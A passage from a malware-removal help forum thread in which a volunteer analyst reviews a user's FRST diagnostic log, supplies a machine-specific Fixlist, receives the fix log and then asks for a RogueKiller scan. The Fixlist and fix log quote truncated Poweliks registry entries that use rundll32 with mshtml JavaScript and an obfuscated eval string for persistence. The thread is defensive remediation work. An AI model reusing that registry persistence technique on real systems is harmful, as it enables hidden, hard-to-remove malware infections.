Description: The program IEXPLORE.EXE version 10.0.9200.16798 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Action Center control panel.
 
Process ID: 35fc
 
Start Time: 01cfe96226cb355b
 
Termination Time: 13
 
Application Path: C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
Report Id:
 
 
System errors:
=============
Error: (10/17/2014 08:28:59 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (10/16/2014 05:03:09 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: {F9717507-6651-4EDB-BFF7-AE615179BCCF}
 
Error: (10/16/2014 09:17:11 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
Error: (10/16/2014 08:28:37 AM) (Source: DCOM) (EventID: 10010) (User: )
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
 
Error: (10/16/2014 07:18:50 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/16/2014 07:12:23 AM) (Source: Service Control Manager) (EventID: 7030) (User: )
Description: The PEVSystemStart service is marked as an interactive service.  However, the system is configured to not allow interactive services.  This service may not function properly.
 
Error: (10/15/2014 05:55:12 PM) (Source: volsnap) (EventID: 36) (User: )
Description: The shadow copies of volume C: were aborted because the shadow copy storage could not grow due to a user imposed limit.
 
Error: (10/15/2014 11:21:00 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
Error: (10/15/2014 10:38:59 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
Error: (10/15/2014 10:26:15 AM) (Source: Schannel) (EventID: 4120) (User: NT AUTHORITY)
Description: The following fatal alert was generated: 10. The internal error state is 10.
 
 
Microsoft Office Sessions:
=========================
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:04 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="x86",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\x86_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_cbf21254470d8752\MFC80U.DLL
 
Error: (10/17/2014 08:11:01 AM) (Source: SideBySide) (EventID: 33) (User: )
Description: Microsoft.VC80.MFCLOC,processorArchitecture="amd64",publicKeyToken="1fc8b3b9a1e18e3b",type="win32",version="8.0.50608.0"C:\Windows\WinSxS\amd64_microsoft.vc80.mfc_1fc8b3b9a1e18e3b_8.0.50727.4053_none_8444db7d32915e4c\MFC80U.DLL
 
Error: (10/16/2014 04:59:08 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: iexplore.exe10.0.9200.16798e4401cfe93d74fbb02f34C:\Program Files\Internet Explorer\iexplore.exe3ec2f959-5577-11e4-8740-fc4dd4391d8c
 
Error: (10/16/2014 04:57:53 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: IEXPLORE.EXE10.0.9200.1679835fc01cfe96226cb355b13C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
 
 
CodeIntegrity Errors:
===================================
  Date: 2014-10-01 14:09:17.272
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
  Date: 2014-10-01 14:09:17.210
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume1\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.
 
 
==================== Memory info =========================== 
 
Processor: Intel® Core™ i7-3770 CPU @ 3.40GHz
Percentage of memory in use: 71%
Total physical RAM: 7987.82 MB
Available physical RAM: 2284.91 MB
Total Pagefile: 15973.84 MB
Available Pagefile: 8428.31 MB
Total Virtual: 8192 MB
Available Virtual: 8191.84 MB
 
==================== Drives ================================
 
Drive c: (Local Disk) (Fixed) (Total:931.51 GB) (Free:861.56 GB) NTFS ==>[Drive with boot components (obtained from BCD)]
Drive g: (Storage) (Network) (Total:499 GB) (Free:77 GB) NTFS
Drive h: (Application) (Network) (Total:500 GB) (Free:226.9 GB) NTFS
 
==================== MBR & Partition Table ==================
 
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 931.5 GB) (Disk ID: DBD7E889)
Partition 1: (Active) - (Size=931.5 GB) - (Type=07 NTFS)
 
==================== End Of Log ============================


#11 Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • Gender:Male
  • Location:127.0.0.1

Posted 18 October 2014 - 02:35 PM

Hi Calimus-

 

Please copy and paste the contents of the code box below into a notepad file and save it as Fixlist.txt to the location where your FRST.exe file is located. I noticed FRST running from a location other than your desktop ("C:\TEMP\Combofix files"). NOTE: It's important that both files, FRST/FRST64 and fixlist.txt, are in the same location or the fix will not work.

HKU\S-1-5-21-1963064-4036034935-1140883825-9640\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://myorkin/
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
2014-09-29 16:42 - 2014-09-29 16:42 - 00003136 _____ () C:\{3DDBF410-6D95-4233-A758-50EA5258FC89}
2014-10-17 10:10 - 2014-01-30 13:51 - 00000544 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0

NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system

Run FRST/FRST64 and press the Fix button just once and wait.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.

When finished FRST will generate a log on the Desktop (Fixlog.txt). Please post it to your reply.

 ==================================================================================================================

IN YOUR NEXT REPLY I NEED:
 
1.)  Your FRST Fixlist log

 

Thanks :)


"DO OR DO NOT. THERE IS NO TRY."


#12 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 20 October 2014 - 05:57 AM

OK, ran the fix and here is the fix log.

 

 

Fix result of Farbar Recovery Tool (FRST written by Farbar) (x64) Version: 20-10-2014
Ran by wsnyder1 at 2014-10-20 06:56:30 Run:1
Running from C:\TEMP\Combofix files
Loaded Profile: wsnyder1 (Available profiles: rpass & Altiris & altirisdeploy & cyoakum1 & ktassone & wsnyder1 & bashburn & netadmin)
Boot Mode: Normal
==============================================
 
Content of fixlist:
*****************
HKU\S-1-5-21-1963064-4036034935-1140883825-9640\...A8F59079A8D5}\localserver32: rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 239 more characters). <==== Poweliks!
CustomCLSID: HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 -> rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";eval("epdvnfou/xsjuf)(=tdsjqu!mbohvbhf>ktds (the data entry has 247 more characters). <==== Poweliks?
HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = http://myorkin/
FF Plugin: @microsoft.com/GENUINE -> disabled No File
FF Plugin-x32: @microsoft.com/GENUINE -> disabled No File
2014-09-29 16:42 - 2014-09-29 16:42 - 00003136 _____ () C:\{3DDBF410-6D95-4233-A758-50EA5258FC89}
2014-10-17 10:10 - 2014-01-30 13:51 - 00000544 _____ () C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0
2014-10-15 08:20 - 2009-07-14 00:45 - 00019072 ____H () C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0
*****************
 
"HKU\S-1-5-21-1963064-4036034935-1140883825-9640\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32" => Key not found.
"HKU\S-1-5-21-1963064-4036034935-1140883825-9640\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
"HKU\S-1-5-21-1963064-4036034935-1140883825-9640_Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}" => Key not found.
HKCU\Software\Microsoft\Internet Explorer\Main\\Start Page => Value was restored successfully.
"HKLM\Software\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
"HKLM\Software\Wow6432Node\MozillaPlugins\@microsoft.com/GENUINE" => Key deleted successfully.
C:\{3DDBF410-6D95-4233-A758-50EA5258FC89} => Moved successfully.
C:\Windows\Tasks\G2MUpdateTask-S-1-5-21-1963064-4036034935-1140883825-9640.job => Moved successfully.
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-1.C7483456-A289-439d-8115-601632D005A0 => Moved successfully.
C:\Windows\system32\7B296FB0-376B-497e-B012-9C450E1B7327-5P-0.C7483456-A289-439d-8115-601632D005A0 => Moved successfully.
 
==== End of Fixlog ====


#13 Calimus

Calimus
  • Topic Starter

  • Members
  • 8 posts
  • OFFLINE
  •  
  • Local time:10:09 PM

Posted 20 October 2014 - 12:22 PM

So, since applying the fix and rebooting, nothing has changed for the better.  Malwarebytes is still giving warnings about the same sites, and now the OS license has reset and is asking to be reapplied.



#14 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 21 October 2014 - 07:02 AM

Hello Calimus-

 

We are making progress but we still have some work to do.   :)

 

Download RogueKiller from one of the following links and save it to your desktop:

§  Link 1

§  Link 2

o   Close all programs and disconnect any USB or external drives before running the tool.

o   Double-click RogueKiller.exe to run the tool (Vista or 7 users: Right-click and select Run As Administrator).

o   Once the Prescan has finished, click Scan.

o   Once the Status box shows "Scan Finished", click the "Report" button to show the log, and then close the program <-- Don't fix anything!

o   Copy and paste the report that opens into your next reply.

§  The log can also be found in the following location: C:\ProgramData\RogueKiller\Logs\RKreport_SCN_mmddyyyy_hhmmss.log

§  >>For XP users, you must first show hidden files/folders, then the log location is here: C:\Documents and Settings\All Users\Application data\RogueKiller\Logs\RKreport_SCN_mmddyyyy_hhmmss.log

 

 ------------------------------------------------------------------------

 

IN YOUR NEXT REPLY I NEED:

 

1.)    Your Rogue Killer log

 

Thanks   :) 

 

"DO OR DO NOT. THERE IS NO TRY."


#15 Johnny Computer

Johnny Computer

  • Malware Response Team
  • 1,739 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:127.0.0.1
  • Local time:09:09 PM

Posted 24 October 2014 - 07:26 AM

Hello Calimus-
 
As stated in my welcome post
 

If I don't hear from you within 3 days from this initial or any subsequent post, then this thread will be closed.

 
It has been 3 days since my last post.  Do you still need help?  If so please follow the instructions in my previous post and copy and paste the log.
 
Thanks  :)


"DO OR DO NOT. THERE IS NO TRY."




